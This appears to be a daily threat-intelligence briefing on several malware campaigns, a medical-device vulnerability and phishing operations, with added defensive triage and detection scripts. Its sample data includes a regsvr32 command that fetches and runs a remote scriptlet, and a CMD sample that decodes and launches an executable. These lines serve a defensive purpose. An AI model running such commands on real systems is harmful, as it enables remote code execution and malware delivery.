Cyware Daily Threat Intelligence
Daily Threat Briefing • Jun 28, 2024
In a sinister ballet of cyber subterfuge, Unfurling Hemlock unleashed "malware cluster bombs," each detonating in digital havoc. More than 50,000 of the group's cluster bomb files have been identified, aimed mostly at systems in the U.S., with Germany, Russia, Turkey, India, and Canada also hit.
Amidst this onslaught, vulnerabilities in the Sensor Net Connect device and Thermoscan IP desktop application could let a non-administrator user gain administrator privileges, jeopardizing medical data and enabling denial-of-service attacks. The vendor, Plug&Track, has yet to respond with fixes.
Meanwhile, China-sponsored operatives launched three credential-phishing campaigns that have compromised at least 40,000 corporate users in 90 days.
Unfurling Hemlock unfurls malware
The Unfurling Hemlock threat actor uses a "malware cluster bomb" technique to drop several malware families onto a compromised system in one go, so that if one payload is detected and removed the others remain, giving the intrusion redundancy and persistence. More than 50,000 cluster bomb files linked to the group have been identified, with the attacks targeting systems primarily in the U.S., as well as in Germany, Russia, Turkey, India, and Canada. The chain begins with the execution of a file named 'WEXTRACT.EXE' (the name of Windows' own cabinet self-extractor stub), which contains nested compressed cabinet (CAB) files, each containing a malware sample. The final stage executes the extracted files in reverse order of extraction, so the innermost payload runs first.
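A first triage step for a dropper like this is to find how many cabinets are embedded in it and how they nest, before extracting anything. The script below is an added example written for this briefing, not code from the Unfurling Hemlock samples or from any vendor tool: it carves CAB headers out of a byte blob using the public CFHEADER layout and reports their nesting. The "dropper" bytes are constructed for the demo (cabinets with headers only, no data blocks), not a real sample.

```python
"""Carve embedded Microsoft Cabinet (CAB) headers out of a dropper and report
how deeply they nest.  Added triage example, not code from the Unfurling
Hemlock samples or from any vendor.  The CFHEADER layout is the public CAB
format; SAMPLE_DROPPER is constructed for the demo and is not a real sample
(its cabinets carry headers only, no CFDATA blocks, so they are not extractable)."""
import struct
from typing import Dict, List

CAB_MAGIC = b"MSCF"
# CFHEADER (36 bytes): signature, reserved1, cbCabinet, reserved2, coffFiles,
# reserved3, versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")


def find_cabinets(data: bytes) -> List[Dict[str, int]]:
    """Return every plausible CAB header in data, in file order."""
    found = []
    pos = data.find(CAB_MAGIC)
    while pos != -1:
        if pos + CFHEADER.size <= len(data):
            (_sig, _r1, cb_cabinet, _r2, coff_files, _r3, v_minor, v_major,
             c_folders, c_files, _flags, _set_id, _i_cab) = CFHEADER.unpack_from(data, pos)
            # Reject false positives: the CAB format version is 1.3, the
            # declared size must fit in the remaining bytes, and the CFFILE
            # table must start inside the cabinet after the header.
            if ((v_major, v_minor) == (1, 3)
                    and CFHEADER.size < cb_cabinet <= len(data) - pos
                    and CFHEADER.size <= coff_files < cb_cabinet):
                found.append({"offset": pos, "size": cb_cabinet,
                              "folders": c_folders, "files": c_files})
        pos = data.find(CAB_MAGIC, pos + 1)
    return found


def nesting_depth(cabs: List[Dict[str, int]]) -> Dict[int, int]:
    """Map each cabinet's offset to how many other cabinets enclose it."""
    def encloses(outer, inner):
        return (outer is not inner
                and outer["offset"] <= inner["offset"]
                and inner["offset"] + inner["size"] <= outer["offset"] + outer["size"])
    return {c["offset"]: sum(encloses(o, c) for o in cabs) for c in cabs}


def _fake_cab(payload: bytes, n_files: int) -> bytes:
    """Constructed CAB header wrapping payload: enough for the carver, not extractable."""
    size = CFHEADER.size + len(payload)
    return CFHEADER.pack(CAB_MAGIC, 0, size, 0, CFHEADER.size, 0,
                         3, 1, 1, n_files, 0, 0x1234, 0) + payload


# Constructed stand-in for a dropper: a PE-like prefix, then a cabinet holding
# two further cabinets in the "cluster bomb" style, then trailing bytes.
SAMPLE_DROPPER = (
    b"MZ" + b"\x00" * 60 + b"stub"
    + _fake_cab(b"A" * 16 + _fake_cab(b"B" * 8 + _fake_cab(b"C" * 4, 1), 2) + b"D" * 8, 3)
    + b"trailer"
)


def triage(data: bytes) -> List[str]:
    """One summary line per cabinet, indented by nesting depth, outermost first."""
    cabs = find_cabinets(data)
    depth = nesting_depth(cabs)
    return [f"{'  ' * depth[c['offset']]}CAB @0x{c['offset']:x} size={c['size']} files={c['files']}"
            for c in cabs]


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_DROPPER)))
```

Signature carving finds the cabinets but not the order in which the final stage runs them; for that the sample still has to be unpacked and its last-stage logic read, so treat the depth report as a map of what to extract, not as the execution order.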
New InnoSetup malware
A new loader disguised as software cracks and commercial tools is being distributed in a way that generates a fresh build for every download attempt: each copy has a different file hash but identical malicious functionality, which defeats hash-based blocklists. The malware is built with InnoSetup and has been dubbed InnoLoader. It displays a normal-looking installer UI and carries out its malicious actions only when the user clicks the "Next" button, so nothing happens in a sandbox that does not click through. Once running, it can download and execute a range of payloads from its C2 server, including infostealers, proxy tools, and adware.
HappyDoor malware in email attacks
North Korean hackers are actively using the HappyDoor malware in spear-phishing email attacks to steal sensitive information and gain remote access. HappyDoor is a backdoor used by the Kimsuky group, a North Korean state-sponsored hacking group, since 2021 and still active as of 2024. The evolving malware is loaded via regsvr32.exe and operates in three stages; it has functions such as screen capture, keylogging, file exfiltration, and communication with its C&C servers over HTTP.
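Because the loader stage runs through regsvr32.exe, a legitimate Windows binary, the useful detection signal is not the image itself but how it is invoked. The script below is an added example, not Kimsuky tooling or any vendor's rule: it scores process-creation records for regsvr32 launches that register a module from a user-writable directory, with a non-DLL extension, from a document-viewer parent, or with a remote scriptlet via /i:. The field names (Image, CommandLine, ParentImage) and the sample records are constructed, and the path and parent heuristics are generic assumptions about spear-phishing delivery, not details of HappyDoor's own file locations.

```python
"""Flag suspicious regsvr32.exe launches in process-creation records.
Added illustrative detection, not Kimsuky tooling or a vendor rule.  Field
names (Image, CommandLine, ParentImage) and SAMPLE_EVENTS are constructed;
the path, extension and parent heuristics are generic assumptions about
how a spear-phishing-delivered DLL tends to be launched, not HappyDoor facts."""
import re
from typing import Dict, List, Tuple

# Directories an email attachment or lure can write to without admin rights.
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|downloads|users\\public|programdata)\\", re.I)
# Where the genuine regsvr32.exe lives; anything else is a copied or renamed binary.
SYSTEM_REGSVR = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\regsvr32\.exe$", re.I)
# Parents that indicate a document lure spawned the loader (assumed list).
DOCUMENT_PARENTS = ("\\winword.exe", "\\excel.exe", "\\powerpnt.exe", "\\outlook.exe")
COM_EXTENSIONS = (".dll", ".ocx", ".ax")


def analyze_regsvr32(record: Dict[str, str]) -> List[str]:
    """Return the reasons a regsvr32 launch looks suspicious ([] if benign or not regsvr32)."""
    image = record.get("Image", "")
    if not image.lower().endswith("\\regsvr32.exe"):
        return []
    reasons = []
    if not SYSTEM_REGSVR.match(image):
        reasons.append(f"regsvr32 outside System32/SysWOW64: {image}")
    # Tokenise the command line, honouring quoted paths, and drop argv[0].
    args = [a.strip('"') for a in re.findall(r'"[^"]*"|\S+', record.get("CommandLine", ""))][1:]
    for arg in args:
        if arg.startswith(("/", "-")):
            switch = arg[1:].lower()
            if switch.startswith("i:") and ("http://" in switch or "https://" in switch):
                reasons.append("scriptlet fetched over HTTP via /i:")
            continue
        if USER_WRITABLE.search(arg):
            reasons.append(f"module in user-writable path: {arg}")
        if not arg.lower().endswith(COM_EXTENSIONS):
            reasons.append(f"module with non-DLL extension: {arg}")
    parent = record.get("ParentImage", "")
    if parent.lower().endswith(DOCUMENT_PARENTS):
        reasons.append(f"spawned by document viewer: {parent}")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for every event that raised at least one flag."""
    hits = []
    for i, event in enumerate(events):
        reasons = analyze_regsvr32(event)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed process-creation records: one benign vendor install, one
# Office-spawned launch of a .dat from Temp, one remote scriptlet, one non-regsvr32.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\report.dat",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(reasons))
```

Each reason is a weak signal on its own (installers do register DLLs silently), so in practice the rule should alert on two or more reasons together, or on the /i: remote-scriptlet case alone, and feed the module path to the file-triage step rather than blocking outright.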
DBatLoader spread via CMD files
ASEC discovered the malware downloader DBatLoader (also known as ModiLoader) being distributed through CMD files. The script is obfuscated and carries a Base64-encoded EXE inside it; when executed, it uses built-in Windows utilities to write and decode the embedded file, then runs the result, which is DBatLoader. The CMD files arrive in phishing emails, so the recommended precautions are to treat unknown emails and attachments with caution and to keep anti-malware software, the operating system, and web browsers up to date.
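A CMD file that decodes an embedded Base64 blob into an executable is easy to triage offline without running it: pull out the Base64 runs, decode them, and check whether the result is a PE. The script below is an added example for this briefing, not ASEC's code or the malware's: it reassembles a blob that the script may have split across several echo lines, validates the MZ/PE headers, and notes whether the script also calls a built-in decoder. The sample CMD text is constructed, with a fake MZ/PE stub in place of a real executable, and the certutil/PowerShell hint is a generic assumption about which built-in utility such scripts use, not a detail from ASEC's report.

```python
"""Triage a .cmd/.bat file for an embedded Base64-encoded PE, the delivery
pattern described for DBatLoader.  Added example; not ASEC's code or the
malware's.  SAMPLE_CMD is constructed with a fake MZ/PE stub in place of a
real executable; DECODER_HINT is a generic assumption about which built-in
Windows utility such scripts use to decode, not a fact from the report."""
import base64
import re
import textwrap
from typing import Dict, Optional

# Runs of Base64 alphabet long enough to be payload rather than an option or name.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
# Built-in decoders a script may invoke (assumed, generic).
DECODER_HINT = re.compile(r"\b(certutil(\.exe)?\s+-decode|powershell.*FromBase64String)", re.I)


def is_pe(raw: bytes) -> bool:
    """True if raw has a DOS 'MZ' header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(raw[0x3C:0x40], "little")
    return raw[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def carve_base64_pe(script_text: str) -> Optional[Dict[str, object]]:
    """Find a Base64-encoded PE in a script, whether written as one run or split across lines."""
    runs = B64_RUN.findall(script_text)
    # Scripts often emit the blob line by line (echo ...>>file), so try the
    # concatenation first, then each run on its own.
    candidates = [("joined", "".join(runs))] if len(runs) > 1 else []
    candidates += [(f"run{i}", run) for i, run in enumerate(runs)]
    for label, chunk in candidates:
        try:
            raw = base64.b64decode(chunk, validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad padding or alphabet
            continue
        if is_pe(raw):
            return {"source": label, "size": len(raw),
                    "decoder_hint": bool(DECODER_HINT.search(script_text))}
    return None


# Constructed PE stub: DOS header with e_lfanew = 0x40, then the PE signature.
FAKE_PE = (b"MZ" + b"\0" * (0x3C - 2) + (0x40).to_bytes(4, "little")
           + b"PE\0\0" + b"constructed-not-real")

# Constructed CMD file in the described shape: obfuscation noise, the blob
# echoed in 40-character lines, a built-in decoder call, then execution.
_lines = textwrap.wrap(base64.b64encode(FAKE_PE).decode(), 40)
SAMPLE_CMD = "\r\n".join(
    ["@echo off", "set x=%TEMP%\\pic.tmp", "if exist %x% del %x%"]
    + [f"echo {line}>>%x%" for line in _lines]
    + ['certutil -decode "%x%" "%TEMP%\\pic.exe"', 'start "" "%TEMP%\\pic.exe"', ""]
)


if __name__ == "__main__":
    print(carve_base64_pe(SAMPLE_CMD))
```

The joined-then-individual order matters: a single 40-character line decodes cleanly and even starts with MZ, but it is too short to carry a PE signature, so checking e_lfanew rather than just the first two bytes is what separates a real embedded executable from a coincidental prefix.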
Bug in Sensor Net Connect and Thermoscan IP
Vulnerabilities discovered in the Sensor Net Connect device and the Thermoscan IP desktop application could allow a non-administrator user to gain administrator privileges, potentially compromising the medical data these systems handle, and could be used to mount denial-of-service attacks against the medical monitoring infrastructure. The vendor, Plug&Track, has not responded to the researchers' disclosure attempts, so no official patch is available. Until a fix ships, the recommended mitigations are to segregate access to the affected systems, monitor their logs and accounts for unexpected privilege changes, and enforce strict access controls.
China-sponsored credential phishing attacks
China-sponsored threat actors have launched three novel credential-phishing campaigns that compromised at least 40,000 corporate users, including top-level executives, in just 90 days. The campaigns, named LegalQloud, Eqooqp, and Boomer, target a range of industries and reach corporate environments through the browser. They rely on HEAT (Highly Evasive Adaptive Threat) techniques: adversary-in-the-middle (AitM) phishing kits that relay the victim's session to defeat MFA, impersonation of entities such as Microsoft, and dynamically generated phishing links that evade URL-based blocklists.